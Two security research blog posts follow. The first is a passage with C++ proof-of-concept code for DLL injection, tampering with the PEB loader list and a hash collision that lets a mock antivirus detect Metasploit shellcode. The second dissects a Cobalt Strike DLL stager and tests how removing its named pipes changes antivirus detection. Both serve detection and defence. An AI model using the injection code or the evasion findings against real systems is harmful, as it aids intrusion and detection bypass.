# Decrementing 'K' by 2 requires adding 8 to 'L'
print(hex(get_hash(upper('IERNEL32.DLT\0'.encode('UTF-16-LE')))))
# "0x92af16da"
# Decrementing 'K' by 1 requires adding 4 to 'L'
print(hex(get_hash(upper('JERNEL32.DLP\0'.encode('UTF-16-LE')))))
# "0x92af16da"
# Incrementing 'K' by 1 requires subtracting 4 from 'L'
print(hex(get_hash(upper('LERNEL32.DLH\0'.encode('UTF-16-LE')))))
# "0x92af16da"
# Incrementing 'K' by 2 requires subtracting 8 from 'L'
print(hex(get_hash(upper('MERNEL32.DLD\0'.encode('UTF-16-LE')))))
# "0x92af16da"

This hash collision combined with the buffer-resize technique can be chained to ensure our custom DLL gets evaluated as KERNEL32.DLL in the hashing routine. From here, if we export a LoadLibraryA function, the Metasploit import resolution will incorrectly call our implementation resulting in an execution flow hijack. This hijack can be leveraged to signal the security solution about a high-confidence Metasploit import resolution taking place.

Building a Proof of Concept

To demonstrate our theory, let’s build a proof-of-concept DLL which will, once loaded, make use of CWE-1288 to simulate how an EDR (Endpoint Detection and Response) solution could detect Metasploit without prior knowledge of its in-memory location. As we want to exploit the above hash collisions, our DLL will be named hernel32.dlx.

The proof of concept has been published on NVISO’s GitHub repository.

The Process Injection

To simulate how a security solution would be injected into most processes, let’s build a simple function which will load our DLL into a process of our choosing.

The Inject function will trick the targeted process into loading a specific DLL (our hernel32.dlx) and execute its DllMain function from where we’ll trigger the buffer-resizing. While multiple techniques exist, we will simply write our DLL’s path into the target process and create a remote thread calling LoadLibraryA. This remote thread will then load our DLL as if the target process intended to do it.

METASPLOP_API
void
Inject(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow)
{
    #pragma EXPORT
    int PID;
    HMODULE hKernel32;
    FARPROC fLoadLibraryA;
    HANDLE hProcess;
    LPVOID lpInject;

    // Recover the current module path
    char payload[MAX_PATH];
    int size;
    if ((size = GetModuleFileNameA(hPayload, payload, MAX_PATH)) == 0)
    {
        MessageBoxError("Unable to get module file name.");
        return;
    }
    
    // Recover LoadLibraryA 
    hKernel32 = GetModuleHandle(L"Kernel32");
    if (hKernel32 == NULL)
    {
        MessageBoxError("Unable to get a handle to Kernel32.");
        return;
    }
    fLoadLibraryA = GetProcAddress(hKernel32, "LoadLibraryA");
    if (fLoadLibraryA == NULL)
    {
        MessageBoxError("Unable to get LoadLibraryA address.");
        return;
    }

    // Open the target process
    PID = std::stoi(lpszCmdLine);
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
    if (!hProcess)
    {
        char message[200];
        if (sprintf_s(message, 200, "Unable to open process %d.", PID) > 0)
        {
            MessageBoxError(message);
        }
        return;
    }

    // Allocate memory for the injection
    lpInject = VirtualAllocEx(hProcess, NULL, size + 1, MEM_COMMIT, PAGE_READWRITE);
    if (lpInject)
    {
        wchar_t buffer[100];
        wsprintfW(buffer, L"You are about to execute the injected library in process %d.", PID);
        if (WriteProcessMemory(hProcess, lpInject, payload, size + 1, NULL) && IDCANCEL != MessageBox(NULL, buffer, L"NVISO Mock AV", MB_ICONINFORMATION | MB_OKCANCEL))
        {
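            // Start LoadLibraryA in the target process with the DLL path as its argument
            HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)fLoadLibraryA, lpInject, 0, NULL);
            if (hThread) CloseHandle(hThread);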
        }
        else
        {
            VirtualFreeEx(hProcess, lpInject, 0, MEM_RELEASE);
        }
    }
    else
    {
        char message[200];
        if (sprintf_s(message, 200, "Unable to allocate %d bytes.", size+1) > 0)
        {
            MessageBoxError(message);
        }
    }
    CloseHandle(hProcess);
    return;
}

As one might notice, the above code relies on the hPayload variable. This variable will be defined in the DllMain function as we aim to get the current DLL’s module regardless of its name, whereas GetModuleHandleA would require us to hard-code the hernel32.dlx name.

HMODULE hPayload;

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        hPayload = hModule;
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

With our Inject method exported, we can now proceed to build the logic needed to trigger CWE-1288.

The Buffer-Resizing

Resizing the BaseDllName buffer from the kernel32.dll module can be accomplished using the logic below. Similar to the shellcode’s technique, we will recover the PEB, walk the InMemoryOrderModuleList and once the KERNEL32.DLL module is found, increase its buffer by 1.

void
Metasplop() {
    PPEB pPeb = NULL;
    PPEB_LDR_DATA pLdrData = NULL;
    PLIST_ENTRY pHeadEntry = NULL;
    PLIST_ENTRY pEntry = NULL;
    PLDR_DATA_TABLE_ENTRY pLdrEntry = NULL;
    USHORT MaximumLength = 0;

    // Read the PEB from the current process
    if ((pPeb = GetCurrentPebProcess()) == NULL) {
        MessageBoxError("GetCurrentPebProcess failed.");
        return;
    }

    // Get the InMemoryOrderModuleList
    pLdrData = pPeb->Ldr;
    pHeadEntry = &pLdrData->InMemoryOrderModuleList;

    // Loop the modules
    for (pEntry = pHeadEntry->Flink; pEntry != pHeadEntry; pEntry = pEntry->Flink) {
        pLdrEntry = CONTAINING_RECORD(pEntry, LDR_DATA_TABLE_ENTRY, InMemoryOrderModuleList);
        // Skip modules which aren't kernel32.dll
        if (lstrcmpiW(pLdrEntry->BaseDllName.Buffer, L"KERNEL32.DLL")) continue;
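        // Compute the new maximum length (UNICODE_STRING lengths are expressed in bytes)
        MaximumLength = pLdrEntry->BaseDllName.MaximumLength + 1;
        // Create a new increased buffer (sized in wchar_t, hence larger than strictly required)
        wchar_t* NewBuffer = new wchar_t[MaximumLength];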
        wcscpy_s(NewBuffer, MaximumLength, pLdrEntry->BaseDllName.Buffer);
        // Update the BaseDllName
        pLdrEntry->BaseDllName.Buffer = NewBuffer;
        pLdrEntry->BaseDllName.MaximumLength = MaximumLength;
        break;
    }
    return;
}
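
Why a single extra byte is enough can be illustrated offline. The sketch below assumes, as described earlier in this post, that the shellcode hashes MaximumLength bytes of BaseDllName. It uses a minimal ROR-13 re-implementation (function names are ours) and shows that, whatever value the additional byte holds, the resulting hash no longer matches the one the shellcode expects for KERNEL32.DLL.

```python
def ror13(value):
    """Rotate a 32-bit integer right by 13 bits."""
    return ((value >> 13) | (value << 19)) & 0xFFFFFFFF


def get_hash(data):
    """ROR-13 additive hash over a byte sequence."""
    result = 0
    for b in data:
        result = (ror13(result) + b) & 0xFFFFFFFF
    return result


# 26 bytes: the original MaximumLength of the KERNEL32.DLL entry
name = 'KERNEL32.DLL\0'.encode('UTF-16-LE')
expected = get_hash(name)

# After the resize, 27 bytes would be hashed. The 27th byte is whatever follows
# the terminator in the new buffer, so every possible value is tried here.
resized = {get_hash(name + bytes([extra])) for extra in range(256)}

print(hex(expected))        # 0x92af16da
print(expected in resized)  # False
```

With the genuine module no longer matching, the colliding DLL is the only candidate left to satisfy the lookup.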

This logic is best triggered as soon as possible once injection has occurred. While this could be done through a TLS hook, we will for simplicity update the existing DllMain function to invoke Metasplop on DLL_PROCESS_ATTACH.

HMODULE hPayload;

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        hPayload = hModule;
        Metasplop();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

The Signal

As the shellcode we analyzed relied on LoadLibraryA, let’s build an implementation which will simply raise the Metasploit alert and then terminate the current malicious process. The following function will only be triggered by the shellcode and is itself never called from within our DLL.

_Ret_maybenull_
HMODULE
WINAPI
LoadLibraryA(_In_ LPCSTR lpLibFileName)
{
    #pragma EXPORT
    // Raise the error message
    char buffer[200];
    if (sprintf_s(buffer, 200, "The process %d has attempted to load \"%s\" through LoadLibraryA using Metasploit's dynamic import resolution.\n", GetCurrentProcessId(), lpLibFileName) > 0)
    {
        MessageBoxError(buffer);
    }
    // Exit the process
    ExitProcess(-1);
}

The above approach can be performed for other variations such as LoadLibraryW, LoadLibraryExA and others.

The Result

With our emulated security solution ready, we can proceed to demonstrate our technique. As such, we’ll start by executing Shellcode.exe, a simple shellcode loader (shown on the left in figure 24). This shellcode loader mentions its process ID (which we’ll target for injection) and then waits for the shellcode path it needs to execute.

Once we know in which process the shellcode will run, we can inject our emulated security solution (shown on the right in figure 24). This process is typically performed by the security solution for each process and is merely done manually in our PoC for simplicity. Using our custom DLL, we can inject into the desired process using the following command where the path to hernel32.dlx and the process ID have been picked accordingly.

# rundll32.exe <dll_path>,Inject <target_pid>
rundll32.exe C:\path\to\hernel32.dlx,Inject 6780

Figure 24: Manually emulating the AV injection into the future malicious process.

Once the injection is performed, the Shellcode.exe process has been staged (module buffer resized, colliding DLL loaded) for exploitation of the CWE-1288 weakness should any Metasploit shellcode run. It is worth noting that at this stage, no shellcode has been loaded nor has there been any memory allocation for it. This ensures we comply with the assumption that we don’t know where shellcode is executing.

With our mock security solution injected, we can proceed to provide the path to our initially generated shellcode (shellcode.vir in our case) to the soon-to-be malicious Shellcode.exe process (left in figure 25).

Figure 25: Executing the malicious shellcode as would be done by the stagers.

Once the shellcode runs, we can see how in figure 26 our LoadLibraryA signalling function gets called, resulting in a high-confidence detection of shellcode-based import resolution.

Figure 26: The input-validation flaw and hash collision being chained to signal the AV.

Disclosure

As a matter of courtesy, NVISO delayed the publishing of this blog post to provide Rapid7, the maintainers of Metasploit, with sufficient review time.

Conclusion

This blog post highlighted the anatomy of Metasploit shellcode with an additional focus on the dynamic import resolution. Within this dynamic import resolution we further identified two weaknesses, one of which can be leveraged to identify runtime Metasploit shellcode with high confidence.

At NVISO, we are always looking at ways to improve our detection mechanisms. Understanding how Metasploit works is one part of the bigger picture and as a result of this research, we were able to build Yara rules identifying Metasploit payloads by fingerprinting both import hashes and average distances between them. A subset of these rules is available upon request.

Anatomy of Cobalt Strike’s DLL Stager

26 April 2021 at 16:51

NVISO recently monitored a targeted campaign against one of its customers in the financial sector. The attempt was spotted at its earliest stage following an employee’s report concerning a suspicious email. While no harm was done, we commonly identify any related indicators to ensure additional monitoring of the actor.

The reported email was an application for one of the company’s public job offers and attempted to deliver a malicious document. What caught our attention, besides leveraging an actual job offer, was the presence of execution-guardrails in the malicious document. Analysis of the document uncovered the intention to persist a Cobalt Strike stager through Component Object Model Hijacking.

During my free time I enjoy analyzing samples NVISO spots in-the-wild, and hence further dissected the Cobalt Strike DLL payload. This blog post will cover the payload’s anatomy, design choices and highlight ways to reduce both log footprint and time-to-shellcode.

Execution Flow Analysis

To understand how the malicious code works we have to analyze its behavior from start to end. In this section, we will cover the following flows:

  1. The initial execution through DllMain.
  2. The sending of encrypted shellcode into a named pipe by WriteBufferToPipe.
  3. The pipe reading, shellcode decryption and execution through PipeDecryptExec.

As previously mentioned, the malicious document’s DLL payload was intended to be used as a COM in-process server. With this knowledge, we can already expect some known entry points to be exposed by the DLL.

List of available entry points as displayed in IDA.

While technically the malicious execution can occur in any of the 8 functions, malicious code commonly resides in the DllMain function given that, besides TLS callbacks, it is the function most likely to execute.

DllMain: An optional entry point into a dynamic-link library (DLL). When the system starts or terminates a process or thread, it calls the entry-point function for each loaded DLL using the first thread of the process. The system also calls the entry-point function for a DLL when it is loaded or unloaded using the LoadLibrary and FreeLibrary functions.

docs.microsoft.com/en-us/windows/win32/dlls/dllmain

Throughout the following analysis, functions and variables have been renamed to reflect their usage and improve clarity.

The DllMain Entry Point

As can be seen in the following capture, the DllMain function simply executes another function by creating a new thread. This threaded function we named DllMainThread is executed without any additional arguments being provided to it.

Graphed disassembly of DllMain.

Analyzing the DllMainThread function uncovers it is an additional wrapper towards what we will discover is the malicious payload’s decryption and execution function (called DecryptBufferAndExec in the capture).

Disassembly of DllMainThread.

By going one level deeper, we can see the start of the malicious logic. Analysts experienced with Cobalt Strike will recognize the well-known MSSE-%d-server pattern.

Disassembly of DecryptBufferAndExec.

A couple of things occur in the above code:

  1. The sample starts by retrieving the tick count through GetTickCount and then divides it by 0x26AA. While obtaining a tick count is often a time measurement, the next operation solely uses the divided tick as a random number.
  2. The sample then proceeds to call a wrapper around an implementation of the sprintf function. Its role is to format a string into the PipeName buffer. As can be observed, the formatted string will be \\.\pipe\MSSE-%d-server where %d will be the result computed in the previous division (e.g.: \\.\pipe\MSSE-1234-server). This pipe’s format is a well-documented Cobalt Strike indicator of compromise.
  3. With the pipe’s name defined in a global variable, the malicious code creates a new thread to run WriteBufferToPipeThread. This function will be the next one we will analyze.
  4. Finally, while the new thread is running, the code jumps to the PipeDecryptExec routine.
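
The pipe-naming step lends itself to a small hunting helper. The sketch below formats a pipe name from an already-computed number and matches candidate names against the documented pattern. The function names and the regular expression are our own illustration, not code recovered from the sample.

```python
import re

# Format string observed in the sample and a matching hunting pattern
PIPE_FORMAT = r'\\.\pipe\MSSE-%d-server'
PIPE_PATTERN = re.compile(r'^\\\\\.\\pipe\\MSSE-\d+-server$', re.IGNORECASE)


def format_pipe_name(number):
    """Build the pipe name for a given pseudo-random number."""
    return PIPE_FORMAT % number


def is_default_stager_pipe(name):
    """Tell whether a pipe name follows the default MSSE-%d-server pattern."""
    return PIPE_PATTERN.match(name) is not None


print(format_pipe_name(1234))                          # \\.\pipe\MSSE-1234-server
print(is_default_stager_pipe(format_pipe_name(1234)))  # True
print(is_default_stager_pipe(r'\\.\pipe\spoolss'))     # False
```

Such a pattern could be applied to pipe-creation telemetry, although a customized pipe name would evade it.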

So far, we had a linear execution from our DllMain entry point until the DecryptBufferAndExec function. We could graph the flow as follows:

Execution flow from DllMain until DecryptBufferAndExec.

As we can see, two threads are now going to run concurrently. Let’s first focus on the one writing into the pipe (WriteBufferToPipeThread), followed by its reading counterpart (PipeDecryptExec).

The WriteBufferToPipe Thread

The thread writing into the generated pipe is launched from DecryptBufferAndExec without any additional arguments. By entering into the WriteBufferToPipeThread function, we can observe it is a simple wrapper to WriteBufferToPipe except it furthermore passes the following arguments recovered from a global Payload variable (pointed to by the pPayload pointer):

  1. The size of the shellcode, stored at offset 0x4.
  2. A pointer to a buffer containing the encrypted shellcode, stored at offset 0x14.

Disassembly of WriteBufferToPipeThread.

Within the WriteBufferToPipe function we can notice the code starts by creating a new pipe. The pipe’s name is recovered from the PipeName global variable which, if you remember, was previously populated by the sprintf function. The code creates a single instance, outbound pipe (PIPE_ACCESS_OUTBOUND) by calling CreateNamedPipeA and then connects to it using the ConnectNamedPipe call.

Graphed disassembly of WriteBufferToPipe’s named pipe creation.

If the connection was successful, the WriteBufferToPipe function proceeds to loop the WriteFile call as long as there are bytes of the shellcode to be written into the pipe.

Graphed disassembly of WriteBufferToPipe writing to the pipe.

One important detail worth noting is that once the shellcode is written into the pipe, the previously opened handle to the pipe is closed through CloseHandle. This indicates that the pipe’s sole purpose was to transfer the encrypted shellcode.

Once the WriteBufferToPipe function is completed, the thread terminates. Overall the execution flow was quite simple and can be graphed as follows:

Execution flow from WriteBufferToPipe.

The PipeDecryptExec Flow

As a quick refresher, the PipeDecryptExec flow was executed immediately after the creation of the WriteBufferToPipe thread. The first task performed by PipeDecryptExec is to allocate a memory region to receive the shellcode to be transmitted through the named pipe. To do so, a call to malloc is performed with the shellcode size, stored at offset 0x4 of the global Payload variable, as its argument.

Once the buffer allocation is completed, the code sleeps for 1024 milliseconds (0x400) and calls FillBufferFromPipe with both the buffer location and the buffer size as arguments. Should the FillBufferFromPipe call fail by returning FALSE (0), the code loops back to the Sleep call and attempts the operation again until it succeeds. These Sleep calls and loops are required as the multi-threaded sample has to wait for the shellcode to be written into the pipe.

Once the shellcode is written to the allocated buffer, PipeDecryptExec will finally launch the decryption and execution through XorDecodeAndCreateThread.

Graphed disassembly of PipeDecryptExec.

To transfer the encrypted shellcode from the pipe into the allocated buffer, FillBufferFromPipe opens the pipe in read-only mode (GENERIC_READ) using CreateFileA. As was done for the pipe’s creation, the name is retrieved from the global PipeName variable. If accessing the pipe fails, the function proceeds to return FALSE (0), resulting in the above described Sleep and retry loop.

Disassembly of FillBufferFromPipe’s pipe access.

Once the pipe is opened in read-only mode, the FillBufferFromPipe function proceeds to copy over the shellcode using ReadFile until the allocated buffer is filled. Once the buffer is filled, the handle to the named pipe is closed through CloseHandle and FillBufferFromPipe returns TRUE (1).

Graphed disassembly of FillBufferFromPipe copying data.

Once FillBufferFromPipe has successfully completed, the named pipe has completed its task and the encrypted shellcode has been moved from one memory region to another.

Back in the caller PipeDecryptExec function, once the FillBufferFromPipe call returns TRUE the XorDecodeAndCreateThread function gets called with the following parameters:

  1. The buffer containing the copied shellcode.
  2. The length of the shellcode, stored at the global Payload variable’s offset 0x4.
  3. The symmetric XOR decryption key, stored at the global Payload variable’s offset 0x8.

Once invoked, the XorDecodeAndCreateThread function starts by allocating yet another memory region using VirtualAlloc. The allocated region has read/write permissions (PAGE_READWRITE) but is not executable. By not making a region writable and executable at the same time, the sample possibly attempts to evade security solutions which only look for PAGE_EXECUTE_READWRITE regions.

Once the region is allocated, the function loops over the shellcode buffer and decrypts each byte using a simple xor operation into the newly allocated region.
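
The decryption loop can be sketched in a few lines of Python. The repeating multi-byte key is an assumption made for illustration (the post only states that each byte is decrypted with a simple xor operation), and the key, the placeholder bytes and the function name are hypothetical.

```python
def xor_decode(encrypted, key):
    """Decode a buffer byte by byte with a repeating XOR key."""
    if not key:
        raise ValueError('key must not be empty')
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(encrypted))


key = bytes([0x13, 0x37, 0xC0, 0xDE])   # hypothetical key, not the sample's
payload = b'placeholder shellcode'      # stand-in bytes, not a real payload

# XOR is symmetric: the same routine both encrypts and decrypts
encrypted = xor_decode(payload, key)
print(encrypted != payload)                   # True
print(xor_decode(encrypted, key) == payload)  # True
```

Since the operation is symmetric, knowing the key is also what later allows a sample to be re-encrypted after modification.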

Graphed disassembly of XorDecodeAndCreateThread.

When the decryption is complete, the GetModuleHandleAndGetProcAddressToArg function is called. Its role is to place pointers to two valuable functions into memory: GetModuleHandleA and GetProcAddress. These functions should enable the shellcode to further resolve additional procedures without relying on them being imported. Before storing these pointers, the GetModuleHandleAndGetProcAddressToArg function first ensures a specific value is not FALSE (0). Surprisingly enough, this value stored in a global variable (here called zero) is always FALSE, resulting in the pointers never being stored.

Graphed disassembly of GetModuleHandleAndGetProcAddressToArg.

Back in the caller function, XorDecodeAndCreateThread changes the shellcode’s memory region to be executable (PAGE_EXECUTE_READ) using VirtualProtect and finally creates a new thread. This final thread starts at the JumpToParameter function which acts as a simple wrapper to the shellcode, provided as argument.

Disassembly of JumpToParameter.

From here, the previously encrypted Cobalt Strike shellcode stager executes to resolve WinINet procedures, download the final beacon and execute it. We will not cover the shellcode’s analysis in this post as it would deserve a post of its own.

While this last flow contained more branches and logic, the overall graph remains quite simple:

Execution flow from PipeDecryptExec until the shellcode.

Memory Flow Analysis

What was most surprising throughout the above analysis was the presence of a well-known named pipe. Pipes can be used as a defense evasion mechanism by decrypting the shellcode at pipe exit or for inter-process communications; but in our case it merely acted as a memcpy to move encrypted shellcode from the DLL into another buffer.

Memory flow from encrypted shellcode until decryption.

So why would this overhead be implemented? As pointed out by another colleague, the answer lies in the Artifact Kit, a Cobalt Strike dependency:

Cobalt Strike uses the Artifact Kit to generate its executables and DLLs. The Artifact Kit is a source code framework to build executables and DLLs that evade some anti-virus products. […] One of the techniques [see: src-common/bypass-pipe.c in the Artifact Kit] generates executables and DLLs that serve shellcode to themselves over a named pipe. If an anti-virus sandbox does not emulate named pipes, it will not find the known bad shellcode.

cobaltstrike.com/help-artifact-kit

As we can see in the above diagram, the staging of the encrypted shellcode in the malloc buffer generates a lot of overhead supposedly for evasion. These operations could be avoided should XorDecodeAndCreateThread instead directly read from the initial encrypted shellcode as outlined in the next diagram. Avoiding the usage of named pipes will furthermore remove the need for looped Sleep calls as the data would be readily available.
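
The equivalence of both memory flows can be sketched in Python. This is an illustration under assumptions: an anonymous os.pipe stands in for the named pipe, a blocking read replaces the Sleep-and-retry loop, and the key, data and function names are hypothetical.

```python
import os
import threading


def xor_decode(data, key):
    """Decode a buffer byte by byte with a repeating XOR key."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def via_pipe(encrypted, key):
    """Original flow: a writer thread feeds the pipe, the reader stages a copy, then decodes."""
    read_fd, write_fd = os.pipe()

    def writer():
        # The pipe handle is closed as soon as the data has been written
        with os.fdopen(write_fd, 'wb') as pipe_in:
            pipe_in.write(encrypted)

    thread = threading.Thread(target=writer)
    thread.start()
    staged = bytearray()
    with os.fdopen(read_fd, 'rb') as pipe_out:
        while len(staged) < len(encrypted):
            chunk = pipe_out.read(len(encrypted) - len(staged))
            if not chunk:
                break
            staged.extend(chunk)
    thread.join()
    return xor_decode(staged, key)


def direct(encrypted, key):
    """Simplified flow: decode straight from the embedded buffer."""
    return xor_decode(encrypted, key)


key = bytes([0x13, 0x37, 0xC0, 0xDE])                # hypothetical key
encrypted = xor_decode(b'placeholder shellcode', key)
print(via_pipe(encrypted, key) == direct(encrypted, key))  # True
```

Both paths produce the same decoded bytes; the pipe only adds a thread, a staging buffer and a copy.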

Improved memory flow from encrypted shellcode until decryption.

It seems we found a way to reduce the time-to-shellcode; but do popular anti-virus solutions actually get tricked by the named pipe?

Patching the Execution Flow

To test that theory, let’s improve the malicious execution flow. For starters we could skip the useless pipe-related calls and have the DllMainThread function call PipeDecryptExec directly, bypassing pipe creation and writing. How the assembly-level patching is performed is beyond this blog post’s scope as we are just interested in the flow’s abstraction.

Disassembly of the patched DllMainThread.

The PipeDecryptExec function will also require patching to skip malloc allocation, pipe reading and ensure it provides XorDecodeAndCreateThread with the DLL’s encrypted shellcode instead of the now-nonexistent duplicated region.

Disassembly of the patched PipeDecryptExec.

With our execution flow patched, we can furthermore zero-out any unused instructions should these be used by security solutions as a detection base.

When the patches are applied, we end up with a linear and shorter path until shellcode execution. The following graph focuses on this patched path and does not include the leaves beneath WriteBufferToPipeThread.

Outline of the patched (red) execution flow and functions.

As we also figured out how the shellcode is encrypted (we have the xor key), we modified both samples to redact the actual C2 as it can be used to identify our targeted customer.

To ensure the shellcode did not rely on any bypassed calls, we spun up a quick Python HTTPS server and made sure the redacted domain resolved to 127.0.0.1. We then can invoke both the original and patched DLL through rundll32.exe and observe how the shellcode still attempts to retrieve the Cobalt Strike beacon, proving our patches did not affect the shellcode. The exported StartW function we invoke is a simple wrapper around the Sleep call.

Capture of both the original and patched DLL attempting to fetch the Cobalt Strike beacon.

Anti-Virus Review

So do named pipes actually work as a defense evasion mechanism? While there are efficient ways to measure our patches’ impact (e.g.: comparing across multiple sandbox solutions), VirusTotal does offer a quick primary assessment. As such, we submitted the following versions with redacted C2 to VirusTotal:

  • wpdshext.dll.custom.vir which is the redacted Cobalt Strike DLL.
  • wpdshext.dll.custom.patched.vir which is our patched and redacted Cobalt Strike DLL without named pipes.

As the original Cobalt Strike contains identifiable patterns (the named pipe), we would expect the patched version to have a lower detection ratio, although the Artifact Kit would disagree.

Capture of the original Cobalt Strike’s detection ratio on VirusTotal.
Capture of the patched Cobalt Strike’s detection ratio on VirusTotal.

As we expected, the named-pipe overhead leveraged by Cobalt Strike actually turned out to act as a detection base. As can be seen in the above captures, while the original version (left) obtained only 17 detections, the patched version (right) obtained one fewer for a total of 16 detections. Among the thrown-off solutions we noticed ESET and Sophos did not manage to detect the pipe-less version, whereas ZoneAlarm couldn’t identify the original version.

One notable observation is that an intermediary patch where the flow is adapted but unused code is not zeroed-out turned out to be the most detected version with a total of 20 hits. This higher detection rate occurs as this patch allows pipe-unaware anti-virus vendors to also locate the shellcode while pipe-related operation signatures are still applicable.

Capture of the intermediary patched Cobalt Strike’s detection ratio on VirusTotal.

While these tests focused on the default Cobalt Strike behavior against the absence of named pipes, one might argue that a customized named pipe pattern would have had the best results. Although we did not think of this variant during the initial tests, we submitted a version with altered pipe names (NVISO-RULES-%d instead of MSSE-%d-server) the day after and obtained 18 detections. As a comparison, our two other samples had their detection rate increase to 30+ overnight. We however have to consider the possibility that these 18 detections are influenced by the initial shellcode being burned.

Conclusion

Reversing the malicious Cobalt Strike DLL turned out to be more interesting than expected. Overall, we noticed the presence of noisy operations whose usage wasn’t a functional requirement and which even turned out to act as a detection base. To confirm our hypothesis, we patched the execution flow and observed how our simplified version still reaches out to the C2 server with a lowered (almost unaltered) detection rate.

So why does it matter?

The Blue

First and foremost, this payload analysis highlights a common Cobalt Strike DLL pattern allowing us to further fine-tune detection rules. While this stager was the first DLL analyzed, we did take a look at other Cobalt Strike formats such as default beacons and those leveraging a malleable C2, both as Dynamic Link Libraries and Portable Executables. Surprisingly enough, all formats shared this commonly documented MSSE-%d-server pipe name and a quick search for open-source detection rules showed how little it is being hunted for.

The Red

Besides being helpful for NVISO’s defensive operations, this research further comforts our offensive team in their choice of leveraging custom-built delivery mechanisms; even more so following the design choices we documented. The usage of named pipes in operations targeting mature environments is more likely to raise red flags and so far does not seem to provide any evasive advantage without alteration in the generation pattern at least.


To the next actor targeting our customers: I am looking forward to modifying your samples and testing the effectiveness of altered pipe names.

Maxime Thiebaut

Maxime Thiebaut is a GCFA-certified intrusion analyst in NVISO’s Managed Detection & Response team. He spends most of his time investigating incidents and improving detection capabilities. Previously, Maxime worked on the SANS SEC699 course. Besides his coding capabilities, Maxime enjoys reverse engineering samples observed in the wild.
